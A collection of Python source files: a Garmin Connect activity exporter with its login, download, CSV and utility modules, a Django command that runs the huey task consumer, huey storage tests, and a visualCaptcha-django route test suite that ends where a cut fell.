metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "jedie/Garmin-Connect-Export-1",
"score": 3
}
|
#### File: jedie/Garmin-Connect-Export-1/gceaccess.py
```python
import http.cookiejar
import json
import logging
import re
import urllib.error
import urllib.parse
import urllib.request
import gceutils
log = logging.getLogger(__name__)
LIMIT_MAXIMUM = 1000
def query_garmin_stats():
log.debug("Getting display name and user stats via: " + URL_GC_PROFILE)
profile_page = http_req(URL_GC_PROFILE).decode()
# write_to_file(args.directory + '/profile.html', profile_page, 'a')
# extract the display name from the profile page, it should be in there as
# \"displayName\":\"eschep\"
pattern = re.compile(
r".*\\\"displayName\\\":\\\"([-.\w]+)\\\".*", re.MULTILINE | re.DOTALL
)
match = pattern.match(profile_page)
if not match:
raise Exception("Did not find the display name in the profile page.")
display_name = match.group(1)
log.info("displayName=" + display_name)
log.info(URL_GC_USERSTATS + display_name)
user_stats = http_req(URL_GC_USERSTATS + display_name)
log.debug("Finished display name and user stats ~~~~~~~~~~~~~~~~~~~~~~~~~~~")
return user_stats
def download_data(download_url, formattype):
# Download the data file from Garmin Connect. If the download fails (e.g., due to timeout),
# this script will die, but nothing will have been written to disk about this activity, so
# just running it again should pick up where it left off.
log.info("\tDownloading file...")
data = ""
try:
data = http_req(download_url)
except urllib.error.HTTPError as errs:
# Handle expected (though unfortunate) error codes; die on unexpected ones.
if errs.code == 500 and formattype == "tcx":
# Garmin will give an internal server error (HTTP 500) when downloading TCX files
# if the original was a manual GPX upload. Writing an empty file prevents this file
# from being redownloaded, similar to the way GPX files are saved even when there
# are no tracks. One could be generated here, but that's a bit much. Use the GPX
# format if you want actual data in every file, as I believe Garmin provides a GPX
# file for every activity.
log.info("\t\tWriting empty file since Garmin did not generate a TCX file for this activity...")
data = ""
elif errs.code == 404 and formattype == "original":
# For manual activities (i.e., entered in online without a file upload), there is
# no original file. # Write an empty file to prevent redownloading it.
log.info("\t\tWriting empty file since there was no original activity data...")
data = ""
else:
raise Exception("Failed. Got an unexpected HTTP error (" + str(errs.code) + download_url + ").")
finally:
return data
def gclogin(username, password):
# DATA = gceaccess.builddata()
# log.debug(urllib.parse.urlencode(DATA))
# Initially, we need to get a valid session cookie, so we pull the login page.
log.debug("Request login page")
http_req(URL_GC_LOGIN)
log.debug("Finish login page")
# Now we'll actually login.
# Fields that are passed in a typical Garmin login.
post_data = {
"username": username,
"password": password,
"embed": "false",
"rememberme": "on",
}
headers = {"referer": URL_GC_LOGIN}
log.debug("Post login data")
login_response = http_req(URL_GC_LOGIN + "#", post_data, headers).decode()
log.debug("Finish login post")
# extract the ticket from the login response
pattern = re.compile(r".*\?ticket=([-\w]+)\";.*", re.MULTILINE | re.DOTALL)
match = pattern.match(login_response)
if not match:
log.debug("the pattern and match do not match")
log.debug("login response = " + str(login_response))
raise Exception(
"Did not get a ticket in the login response. Cannot log in. "
"Did you enter the correct username and password?"
)
login_ticket = match.group(1)
log.debug("Login ticket=" + login_ticket)
log.debug("Request authentication URL: " + URL_GC_POST_AUTH + "ticket=" + login_ticket)
# login to garmin
http_req(URL_GC_POST_AUTH + "ticket=" + login_ticket)
log.debug("Finished authentication")
def http_req(url, post=None, headers=None):
"""Helper function that makes the HTTP requests."""
request = urllib.request.Request(url)
# Tell Garmin we're some supported browser.
request.add_header(
"User-Agent",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, \
like Gecko) Chrome/54.0.2816.0 Safari/537.36",
)
if headers:
for header_key, header_value in headers.items():
request.add_header(header_key, header_value)
if post:
post = urllib.parse.urlencode(post)
post = post.encode("utf-8") # Convert dictionary to POST parameter string.
# print("request.headers: " + str(request.headers) + " COOKIE_JAR: " + str(COOKIE_JAR))
# print("post: " + str(post) + "request: " + str(request))
response = OPENER.open(request, data=post)
if response.getcode() == 204:
# For activities without GPS coordinates, there is no GPX download (204 = no content).
# Write an empty file to prevent redownloading it.
log.info("Writing empty file since there was no GPX activity data...")
return ""
elif response.getcode() != 200:
raise Exception("Bad return code (" + str(response.getcode()) + ") for: " + url)
# print(response.getcode())
return response.read()
def createjson(directory, stractId, actsum):
json_summary = json.loads(actsum)
log.debug(json_summary)
log.debug("Device detail URL: " + URL_DEVICE_DETAIL
+ str(json_summary["metadataDTO"]["deviceApplicationInstallationId"]))
device_detail = http_req(
URL_DEVICE_DETAIL
+ str(json_summary["metadataDTO"]["deviceApplicationInstallationId"])
)
if device_detail:
gceutils.write_to_file(
directory + "/" + stractId + "_app_info.json",
device_detail.decode(), "a",
)
json_device = json.loads(device_detail)
log.debug(json_device)
else:
log.debug("Retrieving Device Details failed.")
json_device = None
log.debug("Activity details URL: " + URL_GC_ACTIVITY + stractId + "/details")
try:
activity_detail = http_req(
URL_GC_ACTIVITY + stractId + "/details"
)
gceutils.write_to_file(
directory + "/" + stractId + "_activity_detail.json",
activity_detail.decode(), "a",
)
json_detail = json.loads(activity_detail)
log.debug(json_detail)
except Exception as error:
print("Retrieving Activity Details failed. Reason: " + str(error))
json_detail = None
log.debug("Gear details URL: " + URL_GEAR_DETAIL + "activityId=" + stractId)
gear_detail = http_req(URL_GEAR_DETAIL + "activityId=" + stractId)
try:
gceutils.write_to_file(directory + "/" + stractId + "_gear_detail.json",
gear_detail.decode(),
"a", )
json_gear = json.loads(gear_detail)
log.debug(json_gear)
except Exception as error:
print("Retrieving Gear Details failed. Error: " + str(error))
json_gear = None
return json_summary, json_gear, json_device, json_detail
def buildcsvrecord(a, json_summary, json_gear, json_device, json_detail):
# Write stats to CSV.
empty_record = ","
csv_record = ""
csv_record += (
empty_record
if "activityName" not in a or not a["activityName"]
else '"' + a["activityName"].replace('"', '""') + '",'
)
# maybe a more elegant way of coding this but need to handle description as null
if "description" not in a:
csv_record += empty_record
elif a["description"] is not None:
csv_record += '"' + a["description"].replace('"', '""') + '",'
else:
csv_record += empty_record
# Gear detail returned as an array so pick the first one
csv_record += (
empty_record
if not json_gear or "customMakeModel" not in json_gear[0]
else json_gear[0]["customMakeModel"] + ","
)
csv_record += (
empty_record
if "startTimeLocal" not in json_summary["summaryDTO"]
else '"' + json_summary["summaryDTO"]["startTimeLocal"] + '",'
)
csv_record += (
empty_record
if "elapsedDuration" not in json_summary["summaryDTO"]
else gceutils.hhmmss_from_seconds(json_summary["summaryDTO"]["elapsedDuration"]) + ","
)
csv_record += (
empty_record
if "movingDuration" not in json_summary["summaryDTO"]
else gceutils.hhmmss_from_seconds(json_summary["summaryDTO"]["movingDuration"]) + ","
)
csv_record += (
empty_record
if "distance" not in json_summary["summaryDTO"]
else "{0:.5f}".format(json_summary["summaryDTO"]["distance"] / 1000) + ","
)
csv_record += (
empty_record
if "averageSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["averageSpeed"]) + ","
)
csv_record += (
empty_record
if "averageMovingSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["averageMovingSpeed"]) + ","
)
csv_record += (
empty_record
if "maxSpeed" not in json_summary["summaryDTO"]
else gceutils.kmh_from_mps(json_summary["summaryDTO"]["maxSpeed"]) + ","
)
csv_record += (
empty_record
if "elevationLoss" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["elevationLoss"]) + ","
)
csv_record += (
empty_record
if "elevationGain" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["elevationGain"]) + ","
)
csv_record += (
empty_record
if "minElevation" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["minElevation"]) + ","
)
csv_record += (
empty_record
if "maxElevation" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxElevation"]) + ","
)
csv_record += empty_record if "minHR" not in json_summary["summaryDTO"] else ","
csv_record += (
empty_record
if "maxHR" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxHR"]) + ","
)
csv_record += (
empty_record
if "averageHR" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageHR"]) + ","
)
csv_record += (
empty_record
if "calories" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["calories"]) + ","
)
csv_record += (
empty_record
if "averageBikeCadence" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageBikeCadence"]) + ","
)
csv_record += (
empty_record
if "maxBikeCadence" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxBikeCadence"]) + ","
)
csv_record += (
empty_record
if "totalNumberOfStrokes" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["totalNumberOfStrokes"]) + ","
)
csv_record += (
empty_record
if "averageTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["averageTemperature"]) + ","
)
csv_record += (
empty_record
if "minTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["minTemperature"]) + ","
)
csv_record += (
empty_record
if "maxTemperature" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["maxTemperature"]) + ","
)
csv_record += (
empty_record
if "activityId" not in a
else '"https://connect.garmin.com/modern/activity/'
+ str(a["activityId"])
+ '",'
)
csv_record += (
empty_record if "endTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record if "beginTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record if "endTimestamp" not in json_summary["summaryDTO"] else ","
)
csv_record += (
empty_record
if not json_device or "productDisplayName" not in json_device
else json_device["productDisplayName"] + " " + json_device["versionString"] + ","
)
csv_record += (
empty_record
if "activityType" not in a
else a["activityType"]["typeKey"].title() + ","
)
csv_record += (
empty_record
if "eventType" not in a
else a["eventType"]["typeKey"].title() + ","
)
csv_record += (
empty_record
if "timeZoneUnitDTO" not in json_summary
else json_summary["timeZoneUnitDTO"]["timeZone"] + ","
)
csv_record += (
empty_record
if "startLatitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["startLatitude"]) + ","
)
csv_record += (
empty_record
if "startLongitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["startLongitude"]) + ","
)
csv_record += (
empty_record
if "endLatitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["endLatitude"]) + ","
)
csv_record += (
empty_record
if "endLongitude" not in json_summary["summaryDTO"]
else str(json_summary["summaryDTO"]["endLongitude"]) + ","
)
csv_record += (
empty_record
if "gainCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "lossCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "maxCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if "minCorrectedElevation" not in json_summary["summaryDTO"]
else ","
)
csv_record += (
empty_record
if not json_detail or "metricsCount" not in json_detail
else str(json_detail["metricsCount"]) + ","
)
csv_record += "\n"
return csv_record
def csvheader():
header = "Activity name,\
Description,\
Bike,\
Begin timestamp,\
Duration (h:m:s),\
Moving duration (h:m:s),\
Distance (km),\
Average speed (km/h),\
Average moving speed (km/h),\
Max. speed (km/h),\
Elevation loss uncorrected (m),\
Elevation gain uncorrected (m),\
Elevation min. uncorrected (m),\
Elevation max. uncorrected (m),\
Min. heart rate (bpm),\
Max. heart rate (bpm),\
Average heart rate (bpm),\
Calories,\
Avg. cadence (rpm),\
Max. cadence (rpm),\
Strokes,\
Avg. temp (°C),\
Min. temp (°C),\
Max. temp (°C),\
Map,\
End timestamp,\
Begin timestamp (ms),\
End timestamp (ms),\
Device,\
Activity type,\
Event type,\
Time zone,\
Begin latitude (°DD),\
Begin longitude (°DD),\
End latitude (°DD),\
End longitude (°DD),\
Elevation gain corrected (m),\
Elevation loss corrected (m),\
Elevation max. corrected (m),\
Elevation min. corrected (m),\
Sample count\n"
return header
COOKIE_JAR = http.cookiejar.CookieJar()
OPENER = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(COOKIE_JAR))
WEBHOST = "https://connect.garmin.com"
REDIRECT = "https://connect.garmin.com/modern/"
BASE_URL = "https://connect.garmin.com/en-US/signin"
SSO = "https://sso.garmin.com/sso"
CSS = "https://static.garmincdn.com/com.garmin.connect/ui/css/gauth-custom-v1.2-min.css"
DATA = {
"service": REDIRECT,
"webhost": WEBHOST,
"source": BASE_URL,
"redirectAfterAccountLoginUrl": REDIRECT,
"redirectAfterAccountCreationUrl": REDIRECT,
"gauthHost": SSO,
"locale": "en_US",
"id": "gauth-widget",
"cssUrl": CSS,
"clientId": "GarminConnect",
"rememberMeShown": "true",
"rememberMeChecked": "false",
"createAccountShown": "true",
"openCreateAccount": "false",
"displayNameShown": "false",
"consumeServiceTicket": "false",
"initialFocus": "true",
"embedWidget": "false",
"generateExtraServiceTicket": "true",
"generateTwoExtraServiceTickets": "false",
"generateNoServiceTicket": "false",
"globalOptInShown": "true",
"globalOptInChecked": "false",
"mobile": "false",
"connectLegalTerms": "true",
"locationPromptShown": "true",
"showPassword": "true",
}
# URLs for various services.
URL_GC_LOGIN = "https://sso.garmin.com/sso/signin?" + urllib.parse.urlencode(DATA)
URL_GC_POST_AUTH = "https://connect.garmin.com/modern/activities?"
URL_GC_PROFILE = "https://connect.garmin.com/modern/profile"
URL_GC_USERSTATS = "https://connect.garmin.com/modern/proxy/userstats-service/statistics/"
URL_GC_LIST = "https://connect.garmin.com/modern/proxy/activitylist-service/activities/search/activities?"
URL_GC_ACTIVITY = "https://connect.garmin.com/modern/proxy/activity-service/activity/"
URL_GC_GPX_ACTIVITY = "https://connect.garmin.com/modern/proxy/download-service/export/gpx/activity/"
URL_GC_TCX_ACTIVITY = "https://connect.garmin.com/modern/proxy/download-service/export/tcx/activity/"
URL_GC_ORIGINAL_ACTIVITY = "http://connect.garmin.com/proxy/download-service/files/activity/"
URL_DEVICE_DETAIL = "https://connect.garmin.com/modern/proxy/device-service/deviceservice/app-info/"
URL_GEAR_DETAIL = "https://connect.garmin.com/modern/proxy/gear-service/gear/filterGear?"
```
#### File: jedie/Garmin-Connect-Export-1/gceutils.py
```python
import logging
import os
import time
from datetime import timedelta
from os import mkdir
from os.path import isdir
from zipfile import ZipFile
####################################################################################################################
# Updates:
# rsjrny 13 May 2019 New file for universal functions
####################################################################################################################
log = logging.getLogger(__name__)
# Zip the files from given directory that matches the filter
def zipfilesindir(dst, src):
"""
:param dst: full path with filename where the archive will be created
:param src: ARGS.directory - we will zip whatever is left in the directory
:return:
"""
log.debug("In zipfilesindir, preparing to archive all file in " + src)
# sleep to allow system to finish processing file. We don't want an inuse or not found error
time.sleep(3)
dirpart = os.path.dirname(dst)
if not isdir(dirpart):
mkdir(dirpart)
log.debug("Archive directory " + dirpart + "created")
# fname = os.path.basename(dst)
zf = ZipFile(dst, "w")
abs_src = os.path.abspath(src)
for dirname, subdirs, files in os.walk(src):
for filename in files:
absname = os.path.abspath(os.path.join(dirname, filename))
arcname = absname[len(abs_src) + 1:]
log.debug("zipping " + os.path.join(dirname, filename) + " as " + arcname)
zf.write(absname, arcname)
zf.close()
log.info("Archive created: " + dst)
def removefiles(dirname, dellist):
# loop thru all files in the directory
log.debug("In removefiles preparing to delete any unwanted files based on the --delete arg")
log.debug(" --delete arg = " + str(dellist))
for filename in os.listdir(dirname):
# split filename and extension.
fname, fext = os.path.splitext(filename)
# if this .ext is in the delete list, delete it
if fext in dellist:
log.debug("deleting: " + dirname + "\\" + filename)
os.remove(dirname + "\\" + filename)
time.sleep(3)
def kmh_from_mps(mps):
"""Helper function that converts meters per second (mps) to km/h."""
return str(mps * 3.6)
def hhmmss_from_seconds(sec):
"""Helper function that converts seconds to HH:MM:SS time format."""
if isinstance(sec, float):
formatted_time = str(timedelta(seconds=int(sec))).zfill(8)
else:
formatted_time = "0.000"
return formatted_time
def decoding_decider(formattype, data):
"""Helper function that decides if a decoding should happen or not."""
if formattype == "original":
# An original file (ZIP file) is binary and not UTF-8 encoded
data = data
elif data:
# GPX and TCX are textfiles and UTF-8 encoded
data = data.decode()
return data
def write_to_file(filename, content, mode):
"""Helper function that persists content to file."""
write_file = open(filename, mode)
write_file.write(content)
write_file.close()
def printverbose(verarg, vermsg):
if verarg:
print(vermsg)
return
```
#### File: jedie/Garmin-Connect-Export-1/gcexport3.py
```python
import argparse
import json
import logging
import sys
import time
import urllib.parse
import urllib.request
import zipfile
from datetime import datetime
from getpass import getpass
from os import mkdir, remove, stat
from os.path import isdir, isfile
from subprocess import call
from sys import argv
from xml.dom.minidom import parseString
import gceaccess
import gceargs
import gceutils
log = logging.getLogger()
logging.basicConfig()
SCRIPT_VERSION = "1.0.0"
CURRENT_DATE = datetime.now().strftime("%Y-%m-%d")
ACTIVITIES_DIRECTORY = "./" + CURRENT_DATE + "_garmin_connect_export"
TOTAL_TO_DOWNLOAD = 0
TOTAL_DOWNLOADED = 0
TOTAL_SKIPPED = 0
TOTAL_RETRIEVED = 0
# define the ARGs
PARSER = argparse.ArgumentParser()
gceargs.addargs(PARSER, ACTIVITIES_DIRECTORY)
ARGS = PARSER.parse_args()
if ARGS.debug:
log.setLevel(logging.DEBUG)
if ARGS.version:
print(argv[0] + ", version " + SCRIPT_VERSION)
sys.exit(0)
USERNAME = ARGS.username if ARGS.username else input("Username: ")
PASSWORD = ARGS.password if ARGS.password else getpass()
def getallfiles():
# If the user wants to download all activities, query the userstats
# on the profile page to know how many are available
user_stats = gceaccess.query_garmin_stats()
# Persist JSON
gceutils.write_to_file(ARGS.directory + "/userstats.json", user_stats.decode(), "a")
# Modify total_to_download based on how many activities the server reports.
json_user = json.loads(user_stats)
return int(json_user["userMetrics"][0]["totalActivities"])
def downloadfile(actid):
"""
Download the file from the garmin site in the requested format. If the file already exists
in the directory the return value is 1 else the download url, filemode and filename are returned
:param actid:
:return:
"""
fitfilename = ""
tcxfilename = ""
gpxfilename = ""
if ARGS.format == "gpx":
datafilename = (ARGS.directory + "/" + actid + "_activity.gpx")
downloadurl = gceaccess.URL_GC_GPX_ACTIVITY + actid + "?full=true"
log.debug("DownloadURL: " + downloadurl)
filemode = "w"
elif ARGS.format == "tcx":
datafilename = (ARGS.directory + "/" + actid + "_activity.tcx")
downloadurl = gceaccess.URL_GC_TCX_ACTIVITY + actid + "?full=true"
log.debug("DownloadURL: " + downloadurl)
filemode = "w"
else:
# some original files may not contain a .fit file. They may only have extracted a gpx or tcx
# so we want to check for all types here.
datafilename = (ARGS.directory + "/" + actid + "_activity.zip")
fitfilename = (ARGS.directory + "/" + actid + ".fit")
tcxfilename = (ARGS.directory + "/" + actid + ".tcx")
gpxfilename = (ARGS.directory + "/" + actid + ".gpx")
downloadurl = gceaccess.URL_GC_ORIGINAL_ACTIVITY + actid
log.debug("DownloadURL: " + downloadurl)
filemode = "wb"
if ARGS.format != "original" and isfile(datafilename):
print("\tData file already exists; skipping...")
return 1, 1, 1
# Regardless of unzip setting, don't redownload if the ZIP or FIT file exists.
# some original files only contain tcx or gpx - check for all types before downloading
if ARGS.format == "original" \
and (isfile(datafilename)
or isfile(fitfilename)
or isfile(tcxfilename)
or isfile(gpxfilename)):
print("\tFIT data file already exists; skipping...")
return 1, 1, 1
return downloadurl, filemode, datafilename
def finalizefiles(data, data_filename):
"""
Finalize the datfile processing. If we are using format gpx see if we have tracks. If we are using
original and the unzip option was selected unzip the file and remove the original file
"""
if ARGS.format == "gpx" and data:
# Validate GPX data. If we have an activity without GPS data (e.g., running on a
# treadmill), Garmin Connect still kicks out a GPX (sometimes), but there is only
# activity information, no GPS data. N.B. You can omit the XML parse (and the
# associated log messages) to speed things up.
gpx = parseString(data)
if gpx.getElementsByTagName("trkpt"):
gceutils.printverbose(ARGS.verbose, "Done. GPX data saved.")
else:
gceutils.printverbose(ARGS.verbose, "Done. No track points found.")
elif ARGS.format == "original":
# Even manual upload of a GPX file is zipped, but we'll validate the extension.
if ARGS.unzip and data_filename[-3:].lower() == "zip":
gceutils.printverbose(ARGS.verbose, "Unzipping and removing original files...")
try:
gceutils.printverbose(ARGS.verbose, "Filesize is: " + str(stat(data_filename).st_size))
except Exception as ferror:
print("Unable to determine file stats for " + data_filename + "Error: " + str(ferror))
return
if stat(data_filename).st_size > 0:
zip_file = open(data_filename, "rb")
z = zipfile.ZipFile(zip_file)
for name in z.namelist():
z.extract(name, ARGS.directory)
zip_file.close()
else:
gceutils.printverbose(ARGS.verbose, "Skipping 0Kb zip file.")
remove(data_filename)
gceutils.printverbose(ARGS.verbose, "Done, getting next file")
time.sleep(3)
else:
gceutils.printverbose(ARGS.verbose, "Done, getting next file.")
def processactivity(alist):
global TOTAL_SKIPPED, TOTAL_RETRIEVED
for a in alist:
# create a string from the activity to avoid having to use the str function multiple times.
stractid = str(a["activityId"])
# Display which entry we're working on.
print("Garmin Connect activity: [" + stractid + "] " + str(a["activityName"]))
# download the file from Garmin
download_url, file_mode, data_filename = downloadfile(stractid)
# if the file already existed go get the next file
if download_url == 1:
TOTAL_SKIPPED += 1
continue
# extract the data from the downloaded file
data = gceaccess.download_data(download_url, ARGS.format)
# if the original zip has no data
if data == "":
print("/tempty file, no data existed in the downloaded file")
continue
TOTAL_RETRIEVED += 1
# write the file
gceutils.write_to_file(data_filename, gceutils.decoding_decider(ARGS.format, data), file_mode)
log.debug("Activity summary URL: " + gceaccess.URL_GC_ACTIVITY + stractid)
# get the summary info, if unavailable go get next file
try:
activity_summary = gceaccess.http_req(gceaccess.URL_GC_ACTIVITY + stractid)
except Exception as aerror:
print("unable to get activity " + str(aerror))
continue
# write the summary file
gceutils.write_to_file(ARGS.directory + "/" + stractid + "_activity_summary.json",
activity_summary.decode(), "a", )
# build the json format files
json_summary, json_gear, json_device, json_detail = gceaccess.createjson(ARGS.directory,
stractid, activity_summary)
# CSV_FILE.write(csv_record)
CSV_FILE.write(gceaccess.buildcsvrecord(a, json_summary, json_gear, json_device, json_detail))
finalizefiles(data, data_filename)
print("Welcome to Garmin Connect Exporter!")
# Create directory for data files.
if isdir(ARGS.directory):
print(
"Warning: Output directory already exists. Will skip already-downloaded files and \
append to the CSV file."
)
try:
gceaccess.gclogin(USERNAME, PASSWORD)
except Exception as error:
print(error)
sys.exit(8)
# create the activities directory if it is not there
if not isdir(ARGS.directory):
mkdir(ARGS.directory)
CSV_FILENAME = ARGS.directory + "/activities.csv"
CSV_EXISTED = isfile(CSV_FILENAME)
CSV_FILE = open(CSV_FILENAME, "a")
if not CSV_EXISTED:
CSV_FILE.write(gceaccess.csvheader())
if ARGS.count == "all":
TOTAL_TO_DOWNLOAD = getallfiles()
else:
TOTAL_TO_DOWNLOAD = int(ARGS.count)
print("Total to download: " + str(TOTAL_TO_DOWNLOAD))
# This while loop will download data from the server in multiple chunks, if necessary.
while TOTAL_DOWNLOADED < TOTAL_TO_DOWNLOAD:
# Maximum chunk size 'limit_maximum' ... 400 return status if over maximum. So download
# maximum or whatever remains if less than maximum.
# As of 2018-03-06 I get return status 500 if over maximum
if TOTAL_TO_DOWNLOAD - TOTAL_DOWNLOADED > gceaccess.LIMIT_MAXIMUM:
NUM_TO_DOWNLOAD = gceaccess.LIMIT_MAXIMUM
else:
NUM_TO_DOWNLOAD = TOTAL_TO_DOWNLOAD - TOTAL_DOWNLOADED
gceutils.printverbose(ARGS.verbose, "Number left to download = " + str(NUM_TO_DOWNLOAD))
search_parms = {"start": TOTAL_DOWNLOADED, "limit": NUM_TO_DOWNLOAD}
log.debug("Search parms" + str(search_parms))
# Query Garmin Connect
log.debug("Activity list URL: " + gceaccess.URL_GC_LIST + urllib.parse.urlencode(search_parms))
activity_list = gceaccess.http_req(gceaccess.URL_GC_LIST + urllib.parse.urlencode(search_parms))
gceutils.write_to_file(ARGS.directory + "/activity_list.json", activity_list.decode(), "a")
processactivity(json.loads(activity_list))
TOTAL_DOWNLOADED += NUM_TO_DOWNLOAD
# End while loop for multiple chunks.
CSV_FILE.close()
# delete the json and csv files before archiving. If requested
if ARGS.delete is not None:
print("deleting types " + str(ARGS.delete) + " from the output directory")
gceutils.removefiles(ARGS.directory, ARGS.delete)
# archive the downloaded files
if ARGS.archive:
print("archiving the downloaded files to: " + ARGS.archive)
gceutils.zipfilesindir(ARGS.archive, ARGS.directory)
# print the final counts
print("Total Requested...." + str(TOTAL_TO_DOWNLOAD))
print("Total Downloaded..." + str(TOTAL_RETRIEVED))
print("Total Skipped......" + str(TOTAL_SKIPPED))
# open the csv file in an external program if requested
if len(ARGS.external):
print("Open CSV output: " + CSV_FILENAME)
# open CSV file. Comment this line out if you don't want this behavior
call([ARGS.external, "--" + ARGS.args, CSV_FILENAME])
print("Done!")
```
|
{
"source": "jedie/huey",
"score": 2
}
|
#### File: management/commands/run_huey.py
```python
import imp
import logging
from django.apps import apps as django_apps
from django.conf import settings
from django.core.management.base import BaseCommand
from huey.consumer import Consumer
from huey.consumer_options import ConsumerConfig
from huey.consumer_options import OptionParserHandler
logger = logging.getLogger(__name__)
class Command(BaseCommand):
"""
Queue consumer. Example usage::
To start the consumer (note you must export the settings module):
django-admin.py run_huey
"""
help = "Run the queue consumer"
_type_map = {'int': int, 'float': float}
def add_arguments(self, parser):
option_handler = OptionParserHandler()
groups = (
option_handler.get_logging_options(),
option_handler.get_worker_options(),
option_handler.get_scheduler_options(),
)
for option_list in groups:
for short, full, kwargs in option_list:
if short == '-v':
full = '--huey-verbose'
short = '-V'
if 'type' in kwargs:
kwargs['type'] = self._type_map[kwargs['type']]
kwargs.setdefault('default', None)
parser.add_argument(full, short, **kwargs)
def autodiscover(self):
"""Use Django app registry to pull out potential apps with tasks.py module."""
module_name = 'tasks'
for config in django_apps.get_app_configs():
app_path = config.module.__path__
try:
fp, path, description = imp.find_module(module_name, app_path)
except ImportError:
continue
else:
import_path = '%s.%s' % (config.name, module_name)
try:
imp.load_module(import_path, fp, path, description)
except ImportError:
logger.exception('Found "%s" but error raised attempting '
'to load module.', import_path)
def handle(self, *args, **options):
from huey.contrib.djhuey import HUEY
consumer_options = {}
try:
if isinstance(settings.HUEY, dict):
consumer_options.update(settings.HUEY.get('consumer', {}))
except AttributeError:
pass
for key, value in options.items():
if value is not None:
consumer_options[key] = value
consumer_options.setdefault('verbose',
consumer_options.pop('huey_verbose', None))
self.autodiscover()
config = ConsumerConfig(**consumer_options)
config.validate()
config.setup_logger()
consumer = Consumer(HUEY, **config.values)
consumer.run()
```
#### File: huey/tests/test_simple.py
```python
import datetime
import sys
import unittest
from huey.contrib.simple_storage import SimpleHuey
from huey.tests.base import BaseTestCase
huey = SimpleHuey()
@huey.task()
def add_numbers(a, b):
return a + b
class TestSimpleHuey(BaseTestCase):
def setUp(self):
huey.storage.flush_all()
def test_queue(self):
res = add_numbers(1, 2)
task = huey.dequeue()
self.assertEqual(huey.execute(task), 3)
self.assertEqual(res.get(), 3)
def test_schedule(self):
ts = datetime.datetime.now().replace(microsecond=0)
make_eta = lambda s: ts + datetime.timedelta(seconds=s)
res1 = add_numbers.schedule((1, 2), eta=make_eta(4), convert_utc=False)
res2 = add_numbers.schedule((2, 3), eta=make_eta(2), convert_utc=False)
self.assertEqual(len(huey), 2)
r = huey.dequeue()
huey.add_schedule(r)
huey.add_schedule(huey.dequeue())
scheduled = huey.read_schedule(make_eta(1))
self.assertEqual(len(scheduled), 0)
scheduled = huey.read_schedule(make_eta(2))
self.assertEqual(len(scheduled), 1)
task, = scheduled
self.assertEqual(huey.execute(task), 5)
self.assertEqual(res2.get(), 5)
scheduled = huey.read_schedule(make_eta(4))
self.assertEqual(len(scheduled), 1)
task, = scheduled
self.assertEqual(huey.execute(task), 3)
self.assertEqual(res1.get(), 3)
if __name__ == '__main__':
unittest.main(argv=sys.argv)
```
|
{
"source": "JediKnightChan/visualCaptcha-django",
"score": 3
}
|
#### File: JediKnightChan/visualCaptcha-django/test.py
```python
import os
import sys
import unittest
import json
from django.test.client import Client
client = {}
frontendData = {}
# Runs before each test
def globalSetup():
global client
# Set a new "client" every time
client = Client()
# Test NonExisting routes
class NonExistingTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# Should return 404 error when calling a non-existing route
def test_unexisting_test_route( self ):
response = client.get( '/test' )
self.assertEqual( response.status_code, 404 )
# Test Start routes
class StartTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# Should return 404 error when calling /start without the number of requested images
def test_start_no_number_of_images( self ):
response = client.get( '/start' )
self.assertEqual( response.status_code, 404 )
# Should return 200 when calling /start/5, the image and audio field names, image name, and image values
def test_start_correct( self ):
global frontendData
response = client.get( '/start/5' )
self.assertEqual( response.status_code, 200 )
data = json.loads( response.content )
self.assertIsNotNone( data['imageName'] )
self.assertIsNotNone( data['imageFieldName'] )
self.assertIsNotNone( data['audioFieldName'] )
self.assertIsNotNone( data['values'] )
self.assertTrue( len(data['imageName']) > 0 )
self.assertTrue( len(data['imageFieldName']) > 0 )
self.assertTrue( len(data['audioFieldName']) > 0 )
self.assertIsInstance( data['values'], list )
self.assertTrue( len(data['values']) > 0 )
self.assertIsNotNone( data['values'][0] )
# Test Audio routes
class AudioTest( unittest.TestCase ):
# Runs before each test in this group
def setUp( self ):
globalSetup()
# This request generates a valid visualCaptcha session
response = client.get( '/start/5' )
# Should return an mp3 audio file
def test_audio_mp3( self ):
response = client.get( '/audio' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'audio/mpeg', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Should return an ogg audio file
def test_audio_ogg( self ):
response = client.get( '/audio/ogg' )
self.assertEqual( response.status_code, 200 )
self.assertEqual( response['Content-Type'], "{'Expires': 0, 'Content-Type': 'audio/ogg', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache, no-store, must-revalidate'}" )
# Test Image routes
